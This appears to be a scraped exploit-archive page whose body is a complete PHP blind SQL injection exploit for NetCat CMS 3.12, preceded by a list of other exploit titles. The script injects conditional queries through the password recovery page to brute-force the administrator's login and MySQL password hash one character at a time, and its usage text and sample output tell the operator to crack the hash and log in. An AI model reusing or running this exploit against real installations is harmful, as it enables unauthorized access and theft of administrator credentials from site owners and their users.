477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
215 lines
4.2 KiB
PHP
Executable file
215 lines
4.2 KiB
PHP
Executable file
<?
|
|
|
|
/*
|
|
NetCat Blind SQL Injection exploit by s4avrd0w [s4avrd0w@p0c.ru]
|
|
Versions affected 3.12
|
|
|
|
More info: http://www.netcat.ru/
|
|
|
|
* tested on version 3.12
|
|
|
|
usage:
|
|
|
|
# ./NetCat_blind_SQL_exploit.php -s=NetCat_server -u=User_ID
|
|
|
|
The options are required:
|
|
-u The user identifier (number in table)
|
|
-s Target for exploiting
|
|
|
|
example:
|
|
|
|
# ./NetCat_blind_SQL_exploit.php -s=http://localhost/netcat/ -u=2
|
|
|
|
[+] Phase 1 brute login.
|
|
[+] Brute 1 symbol...
|
|
...........a
|
|
[+] Brute 2 symbol...
|
|
..............d
|
|
[+] Brute 3 symbol...
|
|
.......................m
|
|
[+] Brute 4 symbol...
|
|
...................i
|
|
[+] Brute 5 symbol...
|
|
........................n
|
|
[+] Brute 6 symbol...
|
|
.....................................
|
|
[+] Phase 1 successfully finished: admin
|
|
[+] Phase 2 brute password-hash.
|
|
[+] Brute 1 symbol...
|
|
*
|
|
[+] Brute 2 symbol...
|
|
.0
|
|
[+] Brute 3 symbol...
|
|
.0
|
|
[+] Brute N symbol...
|
|
|
|
<...>
|
|
|
|
[+] Brute 42 symbol...
|
|
.....................................
|
|
[+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9
|
|
|
|
|
|
[+] Exploiting is finished successfully
|
|
[+] Login - admin
|
|
[+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9
|
|
[+] Decrypt MySQL hash and login into NetCat CMS.
|
|
|
|
*/
|
|
|
|
|
|
function http_connect($query)
|
|
{
|
|
|
|
global $server;
|
|
|
|
$headers = array(
|
|
'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',
|
|
'Referer' => $server
|
|
);
|
|
|
|
$res_http = new HttpRequest($server."modules/auth/password_recovery.php?=1".$query, HttpRequest::METH_GET);
|
|
$res_http->addHeaders($headers);
|
|
|
|
try {
|
|
$response = $res_http->send()->getBody();
|
|
|
|
if (eregi("page_header", $response))
|
|
{
|
|
return 1;
|
|
}
|
|
else
|
|
{
|
|
return 0;
|
|
}
|
|
|
|
} catch (HttpException $exception) {
|
|
|
|
print "[-] Not connected";
|
|
exit(0);
|
|
|
|
}
|
|
|
|
}
|
|
|
|
function brute($User_id,$table)
|
|
{
|
|
$ret_str = "";
|
|
|
|
for ($i=1;$i<43;$i++)
|
|
{
|
|
print "[+] Brute $i symbol...\n";
|
|
|
|
for ($j=42;$j<123;$j++)
|
|
{
|
|
$q = "'/**/OR/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$j,1,0)/*";
|
|
|
|
if (http_connect($q))
|
|
{
|
|
$ret_str=$ret_str.chr($j);
|
|
print chr($j)."\n";
|
|
break;
|
|
}
|
|
print ".";
|
|
|
|
if ($j == 57) $j = 96;
|
|
if ($j == 42) $j = 47;
|
|
|
|
}
|
|
|
|
if ($j == 123) break;
|
|
}
|
|
|
|
return $ret_str;
|
|
}
|
|
|
|
|
|
function help_argc($script_name)
|
|
{
|
|
print "
|
|
usage:
|
|
|
|
# ./".$script_name." -s=NetCat_server -u=User_ID
|
|
|
|
The options are required:
|
|
-u The user identifier (number in table)
|
|
-s Target for exploiting
|
|
|
|
example:
|
|
|
|
# ./".$script_name." -s=http://localhost/netcat/ -u=1
|
|
[+] Phase 1 brute login.
|
|
[+] Brute 1 symbol...
|
|
..1
|
|
[+] Brute 2 symbol...
|
|
.....................................
|
|
[+] Phase 1 successfully finished: 1
|
|
[+] Phase 2 brute password-hash.
|
|
[+] Brute 1 symbol...
|
|
.....................................
|
|
[+] Phase 2 successfully finished:
|
|
|
|
|
|
[+] Exploiting is finished successfully
|
|
[+] Login - 1
|
|
[+] MySQL hash -
|
|
[+] You can login into NetCat CMS with the empty password
|
|
";
|
|
}
|
|
|
|
function successfully($login,$hash)
|
|
{
|
|
print "
|
|
|
|
[+] Exploiting is finished successfully
|
|
[+] Login - $login
|
|
[+] MySQL hash - $hash
|
|
";
|
|
|
|
if ($hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\n";
|
|
else print "[+] You can login into NetCat CMS with the empty password\n";
|
|
|
|
}
|
|
|
|
if (($argc != 3) || in_array($argv[1], array('--help', '-help', '-h', '-?')))
|
|
{
|
|
help_argc($argv[0]);
|
|
exit(0);
|
|
}
|
|
else
|
|
{
|
|
$ARG = array();
|
|
foreach ($argv as $arg) {
|
|
if (strpos($arg, '-') === 0) {
|
|
$key = substr($arg,1,1);
|
|
if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg));
|
|
}
|
|
}
|
|
|
|
if ($ARG[s] && $ARG[u])
|
|
{
|
|
$server = $ARG[s];
|
|
$User_id = intval($ARG[u]);
|
|
$User_id--;
|
|
|
|
print "[+] Phase 1 brute login.\n";
|
|
$login = brute($User_id,"Login");
|
|
print "\n[+] Phase 1 successfully finished: $login\n";
|
|
|
|
print "[+] Phase 2 brute password-hash.\n";
|
|
$hash = brute($User_id,"Password");
|
|
print "\n[+] Phase 2 successfully finished: $hash\n";
|
|
|
|
successfully($login,$hash);
|
|
}
|
|
else
|
|
{
|
|
help_argc($argv[0]);
|
|
exit(0);
|
|
}
|
|
|
|
}
|
|
|
|
?>
|
|
|
|
# milw0rm.com [2008-12-23]
|